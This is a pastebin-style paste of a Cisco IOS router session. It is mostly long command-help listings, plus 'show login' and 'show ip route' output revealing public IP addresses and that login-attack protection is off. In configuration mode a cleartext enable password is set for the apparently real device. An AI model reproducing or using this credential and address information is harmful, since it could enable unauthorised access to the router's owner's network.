  756.   mac-address-table         MAC forwarding table
  757.   mace                      Measurements Aggregation and Correlation Engine
  758.   management-interface      Host management-interface information
  759.   mdf                       Show the names of configured EMM menus
  760.   media                     Display media related information
  761.   memory                    Memory statistics
  762.   mfib                      MFIB address family independent status
  763.   mgcp                      Display Media Gateway Control Protocol information
  764.   microcode                 show configured microcode for downloadable hardware
  765.   modem                     Show modem
  766.   modemcap                  Show Modem Capabilities database
  767.   monitor                   Monitoring different system events
  768.   mpls                      MPLS information
  769.   mrcp                      MRCP information
  770.   mtm                       MTM
  771.   mwi                       mwi related information
  772.   nbf                       NBF (NetBEUI) information
  773.   netconf                   Show NETCONF information
  774.   nhrp                      Display NHRP related information
  775.   ntp                       Network time protocol
  776.   num-exp                   Number Expansion (Speed Dial) information
  777.   object-group              List object groups
  778.   odm-format                Show the schema used for ODM input file
  779.   onep                      ONEP related commands
  780.   ospfv3                    OSPFv3 information
  781.   parameter-map             parameter map information
  782.   parser                    Display parser information
  783.   pas                       Port Adaptor Information
  784.   pci                       PCI Information
  785.   per-call                  Per call debug
  786.   performance               Media Monitor show commands
  787.   persistent                Show persistent information
  788.   pfr                       Performance Routing(PfR) information
  789.   platform                  Displays platform information
  790.   pm                        Show Port Manager commands
  791.   policy-firewall           Show policy-firewall
  792.   policy-manager            Policy Manager
  793.   policy-map                Show Policy Map
  794.   ppp                       PPP parameters and statistics
  795.   pppatm                    PPP over ATM
  796.   pppoe                     PPPoE information
  797.   privilege                 Show current privilege level
  798.   processes                 Active process statistics
  799.   protocols                 Active network routing protocols
  800.   radius                    Shows radius information
  801.   raw-socket                Information for raw socket
  802.   rbscp                     RBSCP information
  803.   region                    Region Manager Status
  804.   registry                  Function registry information
  805.   reload                    Scheduled reload information
  806.   resource                  Display Resource Usage/Relations and more details
  807.   rhosts                    Remote-host+user equivalences
  808.   rib                       Routing Information Base
  809.   rif                       RIF cache entries
  810.   rmon                      rmon statistics
  811.   rom-monitor               show ROMMON region information
  812.   route-map                 route-map information
  813.   route-tag                 route-tag information
  814.   rpms-proc                 RPMS Process Information
  815.   rtpspi                    RTP Service Provider Interface
  816.   rtsp                      Real Time Streaming Protocol information
  817.   rudpv1                    Rudpv1 information
  818.   running-config            Current operating configuration
  819.   sampler                   Sampler information
  820.   sasl                      show SASL information
  821.   sccp                      Display Skinny Client Control Protocol information
  822.   scp                       SCP commands
  823.   sctp                      SCTP information
  824.   sdspfarm                  Show dspfarm status from SCCP server
  825.   secure                    Show secure image and configuration archive
  826.   service-routing           Service-Routing show commands
  827.   sessions                  Information about Telnet connections
  828.   shared-line               Show shared-line info
  829.   sip-ua                    Show SIP User Agent
  830.   smf                       Software MAC filter
  831.   snap                      Show information on SNAP server
  832.   snapshot                  Snapshot parameters and statistics
  833.   snmp                      snmp statistics
  834.   sntp                      Simple network time protocol
  835.   sockets                   Socket Details
  836.   software                  List software information
  837.   spanning-tree             Spanning tree topology
  838.   ssh                       Status of SSH server connections
  839.   ssm                       Segment Switching Manager Status
  840.   stacks                    Process stack utilization
  841.   standby                   Hot Standby Router Protocol (HSRP) information
  842.   startup-config            Contents of startup configuration
  843.   stcapp                    show SCCP Telephony
  844.   storm-control             Show packet storm control configuration
  845.   stun                      STUN status and configuration
  846.   subscriber                Subscriber Service Switch Information
  847.   subscriber-policy         Subscriber policy
  848.   subscription              Subscription information to show
  849.   subsys                    Show subsystem information
  850.   table-map                 Show Table Map
  851.   tacacs                    Shows tacacs+ server statistics
  852.   tcp                       Status of TCP connections
  853.   tech-support              Show system information for Tech-Support
  854.   telephony-service         Show Cisco IOS Telephony Service Configuration & Stats
  855.   template                  Template information
  856.   terminal                  Display terminal configuration parameters
  857.   test_rib_access           RIB_ACCESS TEST info
  858.   time-range                Time range
  859.   topology                  Topology instance information
  860.   track                     Tracking information
  861.   translate                 Protocol translation information
  862.   translation-rule          Show translation rule table
  863.   trunk                     Trunk Group info
  864.   tunnel                    Show configured tunnels
  865.   udp                       UDP Details
  866.   usb                       USB Interface
  867.   user-group                Display User Group information
  868.   users                     Display information about terminal lines
  869.   vc-group                  Show VC Group
  870.   version                   System hardware and software status
  871.   video                     Video monitoring stats
  872.   vlan-switch               VTP VLAN status
  873.   vlans                     Virtual LANs Information
  874.   vnet                      Virtual NETwork instance information
  875.   voice                     Voice port configuration, mon-channels & stats
  876.   voip                      Voice over Internet Protocol information
  877.   vpdn                      VPDN information
  878.   vrf                       VPN Routing/Forwarding instance information
  879.   vrrp                      VRRP information
  880.   vsp                       Voice Streaming Processing information
  881.   vstack                    Vstack show commands
  882.   vtemplate                 Virtual Template interface information
  883.   vtp                       VTP information
  884.   waas                      IOS Wide Area Application Services
  885.   warm-reboot               Show Warm Reboot related information
  886.   wccp                      WCCP information
  887.   webvpn                    WebVPN information
  888.   whoami                    Info on current tty line
  889.   wrr-queue                 WRR queue
  890.   wsma                      Show Web Services Management Agents information
  891.   x25                       X.25 information
  892.   x28                       X.28 rotary information
  893.   x29                       X.29 information
  894.   xconnect                  Xconnect information
  895.   xos                       Cross-OS Library Information and Traces
  896.   xsd-format                Show the ODM XSD for the command
  897.   zone                      Zone Information
  898.   zone-pair                 Zone pair information
  899.  
  900. Burooj_ALIA_RTR_DIA#show login      
  901.      No login delay has been applied.
  902.      No Quiet-Mode access list has been configured.
  903.  
  904.      Router NOT enabled to watch for login Attacks
  905.  
  906. Burooj_ALIA_RTR_DIA#show webvpn
  907. % Incomplete command.
  908.  
  909. Burooj_ALIA_RTR_DIA#show?webvpn
  910. webvpn  
  911.  
  912. Burooj_ALIA_RTR_DIA#show webvpn
  913. % Incomplete command.
  914.  
  915. Burooj_ALIA_RTR_DIA#webvpn
  916. % Incomplete command.
  917.  
  918. Burooj_ALIA_RTR_DIA#show ip route
  919. Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP
  920.        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
  921.        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
  922.        E1 - OSPF external type 1, E2 - OSPF external type 2
  923.        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
  924.        ia - IS-IS inter area, * - candidate default, U - per-user static route
  925.        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP
  926.        a - application route
  927.        + - replicated route, % - next hop override
  928.  
  929. Gateway of last resort is 37.216.203.201 to network 0.0.0.0
  930.  
  931. S*    0.0.0.0/0 [1/0] via 37.216.203.201
  932.       37.0.0.0/8 is variably subnetted, 4 subnets, 2 masks
  933. C        37.216.203.200/30 is directly connected, FastEthernet4
  934. L        37.216.203.202/32 is directly connected, FastEthernet4
  935. C        37.216.203.204/30 is directly connected, Vlan10
  936. L        37.216.203.205/32 is directly connected, Vlan10
  937. Burooj_ALIA_RTR_DIA#show  connections
  938.                                     ^
  939. % Invalid input detected at '^' marker.
  940.  
  941. Burooj_ALIA_RTR_DIA#configure terminal
  942. Enter configuration commands, one per line.  End with CNTL/Z.
  943. Burooj_ALIA_RTR_DIA(config)#enable password I1tlufP
  944. Burooj_ALIA_RTR_DIA(config)#?
  945. Configure commands:
  946.   aaa                         Authentication, Authorization and Accounting.
  947.   aal2-profile                Configure AAL2 profile
  948.   access-list                 Add an access list entry
  949.   alias                       Create command alias
  950.   appfw                       Configure the Application Firewall policy
  951.   application                 Define application
  952.   aqm-register-fnf            Export audio/voice stats to flow record
  953.   archive                     Archive the configuration
  954.   arp                         Set a static ARP entry
  955.   async-bootp                 Modify system bootp parameters
  956.   authentication              Auth Manager Global Configuration Commands
  957.   auto                        Configure Automation
  958.   autoupgrade                 Auto Upgrade Manager simplifies image upgrade process
  959.   backhaul-session-manager    Configure Backhaul Session Manager
  960.   banner                      Define a login banner
  961.   bba-group                   Configure BBA Group
  962.   beep                        Configure BEEP (Blocks Extensible Exchange Protocol)
  963.   bfd                         BFD configuration commands
  964.   bfd-template                BFD template configuration
  965.   boot                        Modify system boot parameters
  966.   bridge                      Bridge Group.
  967.   bstun                       BSTUN global configuration commands
  968.   buffers                     Adjust system buffer pool parameters
  969.   busy-message                Display message when connection to host fails
  970.   call                        Configure Call parameters
  971.   call-history-mib            Define call history mib parameters
  972.   call-home                   Enter call-home configuration mode
  973.   call-manager-fallback       SRST for Cisco Call Manager fallback. For Cisco Unified Communications Manager Express configuration use the
  974.                               'telephony-service' command
  975.   capf-server                 CAPF Server
  976.   carrier-id                  Name of the carrier associated with this trunk group
  977.   ccm-manager                 Call Manager
  978.   cdp                         Global CDP configuration subcommands
  979.   cef                         Cisco Express Forwarding
  980.   chat-script                 Define a modem chat script
  981.   cisp                        Set CISP parameters
  982.   class-map                   Configure CPL Class Map
  983.   clock                       Configure time-of-day clock
  984.   cns                         CNS agents
  985.   config-register             Define the configuration register
  986.   configuration               Configuration access
  987.   connect                     cross-connect two interfaces
  988.   content-scan                Content-Scan
  989.   control-plane               Configure control plane services
  990.   credentials                 credentials service
  991.   crypto                      Encryption module
  992.   csdb                        Common Session Database
  993.   ctl-client                  CTL Client
  994.   cts                         Cisco Trusted Security commands
  995.   cwmp                        Configure CPE WAN Management Protocol(CWMP)
  996.   default                     Set a command to its defaults
  997.   default-value               Default character-bits values
  998.   define                      interface range macro definition
  999.   device-sensor               IOS Sensor Commands
  1000.   dial-control-mib            Define Dial Control Mib parameters
  1001.   dial-peer                   Dial Map (Peer) configuration commands
  1002.   dialer                      Dialer commands
  1003.   dialer-list                 Create a dialer list entry
  1004.   dnsix-dmdp                  Provide DMDP service for DNSIX
  1005.   dnsix-nat                   Provide DNSIX service for audit trails
  1006.   do-exec                     To run exec commands in config mode
  1007.   dot1x                       IEEE 802.1X Global Configuration Commands
  1008.   downward-compatible-config  Generate a configuration compatible with older software
  1009.   dspfarm                     Enable the dspfarm service
  1010.   eap                         EAP Global Configuration Commands
  1011.   emm                         Specify pre-loading of MDF
  1012.   enable                      Modify enable password parameters
  1013.   end                         Exit from configure mode
  1014.   energywise                  EnergyWise Global Configuration Commands
  1015.   eou                         EAPoUDP Global Configuration Commands
  1016.   ephone-type                 define ethernet phone type
  1017.   epm                         EPM Global Configuration Commands
  1018.   errdisable                  Error disable
  1019.   ethernet                    Ethernet configuration
  1020.   event                       Event related configuration commands
  1021.   exception                   Exception handling
  1022.   exit                        Exit from configure mode
  1023.   fax                         Configure fax parameters
  1024.   file                        Adjust file system parameters
  1025.   flow                        Global Flow configuration subcommands
  1026.   flow-sampler-map            Flow sampler configuration
  1027.   format                      Format the output
  1028.   frame-relay                 global frame relay configuration commands
  1029.   gateway                     Gateway
  1030.   global-address-family       Enter address-family base routing topology mode
  1031.   gw-accounting               Enable voip gateway accounting.
  1032.   help                        Description of the interactive help system
  1033.   hostname                    Set system's network name
  1034.  http                        HTTP Config
  1035.  id-manager                  ID Pool Manager
  1036.  ida-client                  IDA Client provides infra for communication with IDA on cisco server
  1037.  identity                    Identity Configuration Commands
  1038.  interface                   Select an interface to configure
  1039.  ip                          Global IP configuration subcommands
  1040.  ipc                         Configure IPC system
  1041.  iphc-profile                Configure IPHC profile
  1042.  ipv6                        Global IPv6 configuration commands
  1043.  iua                         Configure ISDN user Adaptation Layer
  1044.  ivr                         ivr utility command
  1045.  ixi                         IXI Config command
  1046.  key                         Key management
  1047.  kron                        Kron interval Facility
  1048.  l2                          Layer 2 configuration
  1049.  l2protocol-tunnel           Tunnel Layer2 protocols
  1050.  l2tp                        Layer 2 Tunneling Protocol (L2TP) parameters
  1051.  l2tp-class                  l2tp-class configuration
  1052.  l3vpn                       l3vpn encapsulation ip commands
  1053.  li-view                     LI View
  1054.  license                     Configure license features
  1055.  line                        Configure a terminal line
  1056.  lldp                        Global LLDP configuration subcommands
  1057.  logging                     Modify message logging facilities
  1058.  login                       Enable secure login checking
  1059.  login-string                Define a host-specific login string
  1060.  mab                         MAC Authentication Bypass Global Configuration Commands
  1061.  mac-address-table           Configure the MAC address table
  1062.  mace                        Measurement Aggregation and Correlation Engine
  1063.  macro                       Create a command macro
  1064.  map-class                   Configure static map class
  1065.  map-list                    Configure static map list
  1066.  memory                      Configure memory management
  1067.  memory-size                 Adjust memory size by percentage
  1068.  menu                        Define a user-interface menu
  1069.  metadata                    Metadata Application
  1070.  mgcp                        Enable Media Gateway Control Protocol
  1071.  microcode                   configure microcode
  1072.  mmoip                       Multi Media Over IP
  1073.  modemcap                    Modem Capabilities database
  1074.  monitor                     Monitoring different system events
  1075.  mpls                        Configure MPLS parameters
  1076.  mrcp                        MRCP(Real Time Streaming Protocol) configuration
  1077.  mta                         Configure the Mail Transfer Agent
  1078.  multilink                   PPP multilink global configuration
  1079.  netbios                     NETBIOS access control filtering
  1080.  netconf                     Configure NETCONF
  1081.  no                          Negate a command or set its defaults
  1082.  ntp                         Configure NTP
  1083.  num-exp                     Dial Map Number Expansion configuration commands
  1084.  object-group                Configure ACL Object Group
  1085.  onep                        ONEP functionality
  1086.  parameter-map               parameter map
  1087.  parser                      Configure parser
  1088.  password                    Configure encryption password (key)
  1089.  per-call                    Per call debug
  1090.  pfr                         Performance Routing configuration submodes
  1091.  pfr-map                     Create pfr-map and enter pfr-map command mode
  1092.  policy-map                  Configure Policy Map
  1093.  ppp                         PPP global configuration
  1094.  privilege                   Command privilege parameters
  1095.  process                     Configure process
  1096.  process-max-time            Maximum time for process to run before voluntarily relinquishing processor
  1097.  prompt                      Set system's prompt
  1098.   pseudowire-class            Pseudowire-class configuration
  1099.   qos                         Global QoS configuration subcommands
  1100.   rbe                         Commands for Routing RFC 1483 Ethernet encapsulated packets
  1101.   regexp                      regexp commands
  1102.   resource                    Configure Embedded Resource Manager (ERM)
  1103.   resume-string               Define a host-specific resume string
  1104.   rif                         Source-route RIF cache
  1105.   rlogin                      Rlogin configuration commands
  1106.   rmon                        Remote Monitoring
  1107.   route-map                   Create route-map or enter route-map command mode
  1108.   route-tag                   Route Tag
  1109.   router                      Enable a routing process
  1110.   rtsp                        RTSP(Real Time Streaming Protocol) configuration
  1111.   sampler                     Define a Sampler
  1112.   sasl                        Configure SASL
  1113.   sccp                        Enable Skinny Client Control Protocol
  1114.   scheduler                   Scheduler parameters
  1115.   scripting                   Configure options for scripting languages
  1116.   secure                      Secure image and configuration archival commands
  1117.   security                    Infra Security CLIs
  1118.   service                     Modify use of network based services
  1119.   service-routing             Configure service-routing
  1120.   shell                       Configure shell command
  1121.   shutdown                    Shutdown system elements
  1122.   signaling-class             Configure signaling class
  1123.   sip-ua                      SIP User Agent (UA)
  1124.   snap                        SNAP configuration
  1125.   snmp                        Modify non engine SNMP parameters
  1126.   snmp-server                 Modify SNMP engine parameters
  1127.   sntp                        Configure SNTP
  1128.   spanning-tree               Spanning Tree Subsystem
  1129.   stacks                      Configure stacks
  1130.   standby                     Global HSRP configuration commands
  1131.   state-machine               Define a TCP dispatch state machine
  1132.   stcapp                      Start SCCP Telephony Control Application
  1133.   stun                        STUN global configuration commands
  1134.   subscriber                  Subscriber configuration
  1135.   subscriber-policy           Subscriber policy
  1136.   subscription                ASNL based Subscriptions configuration
  1137.   table-map                   Configure Table Map
  1138.   tacacs-server               Modify TACACS query parameters
  1139.   telephony-service           Configure Cisco Unified Communications Manager Express
  1140.   template                    Select a template to configure
  1141.   terminal-queue              Terminal queue commands
  1142.   tftp-server                 Provide TFTP service for netload requests
  1143.   time-range                  Define time range entries
  1144.   track                       Object tracking configuration commands
  1145.   translate                   Translate global configuration commands
  1146.   translation-rule            Global digit manipulation and translation
  1147.   trunk                       Global trunk configuration
  1148.   user-group                  User Group Configuration Commands
  1149.   username                    Establish User Name Authentication
  1150.   vc-group                    Define a Frame Relay VC group
  1151.   virtual-template            Virtual Template configuration
  1152.   vlan                        VLAN commands
  1153.   vm-integration              enable in-band DTMF integration with voicemail systems
  1154.   voice                       Global voice configuration
  1155.   voice-card                  Configure a specific voice-card
  1156.   voice-ctl-file              Configure a ctl-file instance
  1157.   voice-phone-proxy           Configure Phone proxy
  1158.   voicecap                    Add a voicecap entry
  1159.   voip-incoming               Global incoming VoIP configuration
  1160.   vpdn                        Virtual Private Dialup Network
  1161.   vpdn-group                  VPDN group configuration
  1162.   vpdn-template               vpdn-template configuration
  1163.   vrf                         VRF commands
  1164.   vstack                      Configure vstack parameters and enable or disable SmartInstall
  1165.   vtp                         Configure global VTP state
  1166.   vty-async                   Enable virtual async line configuration
  1167.   waas                        IOS Wide Area Application Services
  1168.   warm-reboot                 Warm reboot allows quick reload in case of a crash or by request
  1169.   webvpn                      SSL VPN Commands
  1170.   wrr-queue                   Configure weighted round-robin xmt queues
  1171.   wsma                        Configure Web Services Management Agents
  1172.   x25                         X.25 Level 3
  1173.   x29                         X29 commands
  1174.   xconnect                    Xconnect config commands
  1175.   xot                         Global XOT commands
  1176.   zone                        FW with zoning
  1177.   zone-pair                   Zone pair command
  1178.          
  1179. Burooj_ALIA_RTR_DIA(config)#
  1180. Burooj_ALIA_RTR_DIA(config)#?
  1181. Configure commands:
  1182.   aaa                         Authentication, Authorization and Accounting.
  1183.   aal2-profile                Configure AAL2 profile
  1184.   access-list                 Add an access list entry
  1185.   alias                       Create command alias
  1186.   appfw                       Configure the Application Firewall policy
  1187.   application                 Define application
  1188.   aqm-register-fnf            Export audio/voice stats to flow record
  1189.   archive                     Archive the configuration
  1190.   arp                         Set a static ARP entry
  1191.   async-bootp                 Modify system bootp parameters
  1192.   authentication              Auth Manager Global Configuration Commands
  1193.   auto                        Configure Automation
  1194.   autoupgrade                 Auto Upgrade Manager simplifies image upgrade process
  1195.   backhaul-session-manager    Configure Backhaul Session Manager
  1196.   banner                      Define a login banner
  1197.   bba-group                   Configure BBA Group
  1198.   beep                        Configure BEEP (Blocks Extensible Exchange Protocol)
  1199.   bfd                         BFD configuration commands
  1200.   bfd-template                BFD template configuration
  1201.   boot                        Modify system boot parameters
  1202.   bridge                      Bridge Group.
  1203.   bstun                       BSTUN global configuration commands
  1204.   buffers                     Adjust system buffer pool parameters
  1205.   busy-message                Display message when connection to host fails
  1206.   call                        Configure Call parameters
  1207.   call-history-mib            Define call history mib parameters
  1208.   call-home                   Enter call-home configuration mode
  1209.   call-manager-fallback       SRST for Cisco Call Manager fallback. For Cisco Unified Communications Manager Express configuration use the
  1210.                               'telephony-service' command
  1211.   capf-server                 CAPF Server
  1212.   carrier-id                  Name of the carrier associated with this trunk group
  1213.   ccm-manager                 Call Manager
  1214.   cdp                         Global CDP configuration subcommands
  1215.   cef                         Cisco Express Forwarding
  1216.   chat-script                 Define a modem chat script
  1217.   cisp                        Set CISP parameters
  1218.   class-map                   Configure CPL Class Map
  1219.   clock                       Configure time-of-day clock
  1220.   cns                         CNS agents
  1221.   config-register             Define the configuration register
  1222.   configuration               Configuration access
  1223.   connect                     cross-connect two interfaces
  1224.   content-scan                Content-Scan
  1225.   control-plane               Configure control plane services
  1226.   credentials                 credentials service
  1227.   crypto                      Encryption module
  1228.   csdb                        Common Session Database
  1229.   ctl-client                  CTL Client
  1230.   cts                         Cisco Trusted Security commands
  1231.   cwmp                        Configure CPE WAN Management Protocol(CWMP)
  1232.   default                     Set a command to its defaults
  1233.   default-value               Default character-bits values
  1234.   define                      interface range macro definition
  1235.   device-sensor               IOS Sensor Commands
  1236.   dial-control-mib            Define Dial Control Mib parameters
  1237.   dial-peer                   Dial Map (Peer) configuration commands
  1238.   dialer                      Dialer commands
  1239.   dialer-list                 Create a dialer list entry
  1240.   dnsix-dmdp                  Provide DMDP service for DNSIX
  1241.   dnsix-nat                   Provide DNSIX service for audit trails
  1242.   do-exec                     To run exec commands in config mode
  1243.   dot1x                       IEEE 802.1X Global Configuration Commands
  1244.   downward-compatible-config  Generate a configuration compatible with older software
  1245.   dspfarm                     Enable the dspfarm service
  1246.   eap                         EAP Global Configuration Commands
  1247.   emm                         Specify pre-loading of MDF
  1248.   enable                      Modify enable password parameters
  1249.   end                         Exit from configure mode
  1250.   energywise                  EnergyWise Global Configuration Commands
  1251.   eou                         EAPoUDP Global Configuration Commands
  1252.   ephone-type                 define ethernet phone type
  1253.   epm                         EPM Global Configuration Commands
  1254.   errdisable                  Error disable
  1255.   ethernet                    Ethernet configuration
  1256.   event                       Event related configuration commands
  1257.   exception                   Exception handling
  1258.   exit                        Exit from configure mode
  1259.   fax                         Configure fax parameters
  1260.   file                        Adjust file system parameters
  1261.   flow                        Global Flow configuration subcommands
  1262.   flow-sampler-map            Flow sampler configuration
  1263.   format                      Format the output
  1264.   frame-relay                 global frame relay configuration commands
  1265.   gateway                     Gateway
  1266.   global-address-family       Enter address-family base routing topology mode
  1267.   gw-accounting               Enable voip gateway accounting.
  1268.   help                        Description of the interactive help system
  1269.   hostname                    Set system's network name
  1270.  http                        HTTP Config
  1271.  id-manager                  ID Pool Manager
  1272.  ida-client                  IDA Client provides infra for communication with IDA on cisco server
  1273.  identity                    Identity Configuration Commands
  1274.  interface                   Select an interface to configure
  1275.  ip                          Global IP configuration subcommands
  1276.  ipc                         Configure IPC system
  1277.  iphc-profile                Configure IPHC profile
  1278.  ipv6                        Global IPv6 configuration commands
  1279.  iua                         Configure ISDN user Adaptation Layer
  1280.  ivr                         ivr utility command
  1281.  ixi                         IXI Config command
  1282.  key                         Key management
  1283.  kron                        Kron interval Facility
  1284.  l2                          Layer 2 configuration
  1285.  l2protocol-tunnel           Tunnel Layer2 protocols
  1286.  l2tp                        Layer 2 Tunneling Protocol (L2TP) parameters
  1287.  l2tp-class                  l2tp-class configuration
  1288.  l3vpn                       l3vpn encapsulation ip commands
  1289.  li-view                     LI View
  1290.  license                     Configure license features
  1291.  line                        Configure a terminal line
  1292.  lldp                        Global LLDP configuration subcommands
  1293.  logging                     Modify message logging facilities
  1294.  login                       Enable secure login checking
  1295.  login-string                Define a host-specific login string
  1296.  mab                         MAC Authentication Bypass Global Configuration Commands
  1297.  mac-address-table           Configure the MAC address table
  1298.  mace                        Measurement Aggregation and Correlation Engine
  1299.  macro                       Create a command macro
  1300.  map-class                   Configure static map class
  1301.  map-list                    Configure static map list
  1302.  memory                      Configure memory management
  1303.  memory-size                 Adjust memory size by percentage
  1304.  menu                        Define a user-interface menu
  1305.  metadata                    Metadata Application
  1306.  mgcp                        Enable Media Gateway Control Protocol
  1307.  microcode                   configure microcode
  1308.  mmoip                       Multi Media Over IP
  1309.  modemcap                    Modem Capabilities database
  1310.  monitor                     Monitoring different system events
  1311.  mpls                        Configure MPLS parameters
  1312.  mrcp                        MRCP(Real Time Streaming Protocol) configuration
  1313.  mta                         Configure the Mail Transfer Agent
  1314.  multilink                   PPP multilink global configuration
  1315.  netbios                     NETBIOS access control filtering
  1316.  netconf                     Configure NETCONF
  1317.  no                          Negate a command or set its defaults
  1318.  ntp                         Configure NTP
  1319.  num-exp                     Dial Map Number Expansion configuration commands
  1320.  object-group                Configure ACL Object Group
  1321.  onep                        ONEP functionality
  1322.  parameter-map               parameter map
  1323.  parser                      Configure parser
  1324.  password                    Configure encryption password (key)
  1325.  per-call                    Per call debug
  1326.  pfr                         Performance Routing configuration submodes
  1327.  pfr-map                     Create pfr-map and enter pfr-map command mode
  1328.  policy-map                  Configure Policy Map
  1329.  ppp                         PPP global configuration
  1330.  privilege                   Command privilege parameters
  1331.  process                     Configure process
  1332.  process-max-time            Maximum time for process to run before voluntarily relinquishing processor
  1333.  prompt                      Set system's prompt
  1334.   pseudowire-class            Pseudowire-class configuration
  1335.   qos                         Global QoS configuration subcommands
  1336.   rbe                         Commands for Routing RFC 1483 Ethernet encapsulated packets
  1337.   regexp                      regexp commands
  1338.   resource                    Configure Embedded Resource Manager (ERM)
  1339.   resume-string               Define a host-specific resume string
  1340.   rif                         Source-route RIF cache
  1341.   rlogin                      Rlogin configuration commands
  1342.   rmon                        Remote Monitoring
  1343.   route-map                   Create route-map or enter route-map command mode
  1344.   route-tag                   Route Tag
  1345.   router                      Enable a routing process
  1346.   rtsp                        RTSP(Real Time Streaming Protocol) configuration
  1347.   sampler                     Define a Sampler
  1348.   sasl                        Configure SASL
  1349.   sccp                        Enable Skinny Client Control Protocol
  1350.   scheduler                   Scheduler parameters
  1351.   scripting                   Configure options for scripting languages
  1352.   secure                      Secure image and configuration archival commands
  1353.   security                    Infra Security CLIs
  1354.   service                     Modify use of network based services
  1355.   service-routing             Configure service-routing
  1356.   shell                       Configure shell command
  1357.   shutdown                    Shutdown system elements
  1358.   signaling-class             Configure signaling class
  1359.   sip-ua                      SIP User Agent (UA)
  1360.   snap                        SNAP configuration
  1361.   snmp                        Modify non engine SNMP parameters
  1362.   snmp-server                 Modify SNMP engine parameters
  1363.   sntp                        Configure SNTP
  1364.   spanning-tree               Spanning Tree Subsystem
  1365.   stacks                      Configure stacks
  1366.   standby                     Global HSRP configuration commands
  1367.   state-machine               Define a TCP dispatch state machine
  1368.   stcapp                      Start SCCP Telephony Control Application
  1369.   stun                        STUN global configuration commands
  1370.   subscriber                  Subscriber configuration
  1371.   subscriber-policy           Subscriber policy
  1372.   subscription                ASNL based Subscriptions configuration
  1373.   table-map                   Configure Table Map
  1374.   tacacs-server               Modify TACACS query parameters
  1375.   telephony-service           Configure Cisco Unified Communications Manager Express
  1376.   template                    Select a template to configure
  1377.   terminal-queue              Terminal queue commands
  1378.   tftp-server                 Provide TFTP service for netload requests
  1379.   time-range                  Define time range entries
  1380.   track                       Object tracking configuration commands
  1381.   translate                   Translate global configuration commands
  1382.   translation-rule            Global digit manipulation and translation
  1383.   trunk                       Global trunk configuration
  1384.   user-group                  User Group Configuration Commands
  1385.   username                    Establish User Name Authentication
  1386.   vc-group                    Define a Frame Relay VC group
  1387.   virtual-template            Virtual Template configuration
  1388.   vlan                        VLAN commands
  1389.   vm-integration              enable in-band DTMF integration with voicemail systems
  1390.   voice                       Global voice configuration
  1391.   voice-card                  Configure a specific voice-card
  1392.   voice-ctl-file              Configure a ctl-file instance
  1393.   voice-phone-proxy           Configure Phone proxy
  1394.   voicecap                    Add a voicecap entry
  1395.   voip-incoming               Global incoming VoIP configuration
  1396.   vpdn                        Virtual Private Dialup Network
  1397.   vpdn-group                  VPDN group configuration
  1398.   vpdn-template               vpdn-template configuration
  1399.   vrf                         VRF commands
  1400.   vstack                      Configure vstack parameters and enable or disable SmartInstall
  1401.   vtp                         Configure global VTP state
  1402.   vty-async                   Enable virtual async line configuration
  1403.   waas                        IOS Wide Area Application Services
  1404.   warm-reboot                 Warm reboot allows quick reload in case of a crash or by request
  1405.   webvpn                      SSL VPN Commands
  1406.   wrr-queue                   Configure weighted round-robin xmt queues
  1407.   wsma                        Configure Web Services Management Agents
  1408.   x25                         X.25 Level 3
  1409.   x29                         X29 commands
  1410.   xconnect                    Xconnect config commands
  1411.   xot                         Global XOT commands
  1412.   zone                        FW with zoning
  1413.   zone-pair                   Zone pair command
  1414.  
  1415. Burooj_ALIA_RTR_DIA(config)#show ?                                  
  1416. % Unrecognized command
  1417. Burooj_ALIA_RTR_DIA(config)#show webvpn
  1418.                               ^
  1419. % Invalid input detected at '^' marker.
  1420.  
  1421. Burooj_ALIA_RTR_DIA(config)#webvpn
  1422. % Incomplete command.
  1423.  
  1424. Burooj_ALIA_RTR_DIA(config)#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement